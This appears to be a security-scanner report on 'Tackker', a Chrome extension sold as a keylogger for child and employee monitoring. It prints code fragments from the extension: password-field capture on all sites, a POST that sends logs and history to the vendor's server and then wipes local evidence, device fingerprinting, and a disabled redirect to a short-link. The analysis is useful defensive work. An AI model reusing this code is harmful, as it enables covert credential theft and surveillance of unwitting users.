Security Alert: Malware Risk Confirmed
Free Keylogger Tool - Child Monitor Tackker
ID: ekpkdmohpdnebfedjjfklhpefgpgaaji
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- tackker.comView Profile
- Privacy
- Privacy Policy
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
- Website
- Visit
Tackker is a free keylogger tool that helps you in Child Monitoring and other ethical monitoring services.
tackker is online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring. And Now You can also monitor your browsing history. Install Tackker and get peace of mind ;) tackker have made browser activity monitoring so easy. Monitor any browser activity by following these simple steps: 1) Install tackker on target system browser(s). 2) After installation, you will be directed to register/login (this part is important since without registering you can not see the logged data). 3) Once you are registered and the plugin is installed , simply monitor user activity from our online dashboard.
The dontLog array explicitly excludes several non-sensitive input types but does NOT exclude type='password'. This means password fields on every banking site, email provider, and social network visited by the victim are captured on focusout and Enter keypress and written to local storage before being exfiltrated. The code runs as a content script matching <all_urls>, so no site is exempt.
var watchedElements = ["INPUT", "TEXTAREA"], url = window.location, dontLog = ["button", "image", "reset", "submit", "radio", "checkbox", "color", "range"];function getInputValue(t) { var e = ~watchedElements.indexOf(t.nodeName) || "true" === t.contentEditable; if (-1 === e) { if (!~dontLog.indexOf(t.type)) return t.value } else { if (-2 === e) return t.value; if (!0 === e) return t.innerText.trim() .replace(/(\n|\r)+/g, " \n") } return null}Every 5 minutes (via chrome.alarms), the background service worker POSTs all accumulated keystroke logs (logHistory, which includes captured input values, timestamps, and origin URLs) together with the full browsing history (urlHistory, which includes device fingerprint fields) to https://www.tackker.com/send-data. After a successful response the local store is wiped, removing local forensic evidence. This is a complete exfiltration pipeline covering credential data captured on the victim's device.
const payload = { app: appId, data: logs, history: history};const response = await fetch("https://www.tackker.com/send-data", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(payload)});if (!response.ok) throw new Error(`Server returned status ${response.status}`);await setStorage({ logHistory: [], urlHistory: [],});Every page navigation records the full URL, referrer, navigation method, user agent string, OS name, browser name and version, device model, and accept-language header, then stores this record in urlHistory for later exfiltration. This goes beyond the 'Web history' disclosure by attaching a persistent device fingerprint to every record, enabling the remote operator to de-anonymize the victim and correlate activity across sessions regardless of IP changes.
var newEntry = { 'url': document.location.href, 'content_type': contentType, 'timestamp': today.getTime(), 'referrer': lastUrl, 'navigation_method': navigationMethod, 'user_agent': navigator.userAgent, 'scheme': window.location.protocol, 'host': window.location.host, 'accept_language': navigator.language, 'device_manufacturer': 'unknown', 'device_model': getBasicDeviceModel(), 'os_name': getOS(), 'os_version': 'unknown', 'browser_name': browserInfo.browserName, 'browser_version': browserInfo.browserVersion, 'navigation_type': 'foreground-navigation', 'year': today.getFullYear(), 'month': today.getMonth() + 1, 'day': today.getDate(),}Commented-out code shows a prior version of the extension opened http://intamema.com/5F2c (an obfuscated short-link to an unrelated external domain) once per day via a 50-second polling interval. This pattern — ad/redirect injection hidden in a monitoring tool — is consistent with the socket.dev spamware campaign IoC and indicates the extension has been used to deliver unwanted navigations in addition to keylogging. The code is disabled in this build but is present in the source, indicating the capability was intentional.
// window.addEventListener("load", function(){// const interval = setInterval(function() {// ...// chrome.storage.local.get({lastShowed: []}, function (result) {// console.log(result.lastShowed);// if(new Date(date)>= new Date(result.lastShowed)){// window.open('http://intamema.com/5F2c', '_blank');// chrome.storage.local.set({lastShowed: date}, function () {});// }// });// }, 50000);// });By severity
Versions scanned
Showing 3 of 18 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 3.1 | 4 |
| 3.0 | 10 |
| 1.7 | 4 |
Files with findings
4 distinct paths — top paths by unique finding count:
- content.js12
- back.js3
- popup.js2
- manifest.json1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.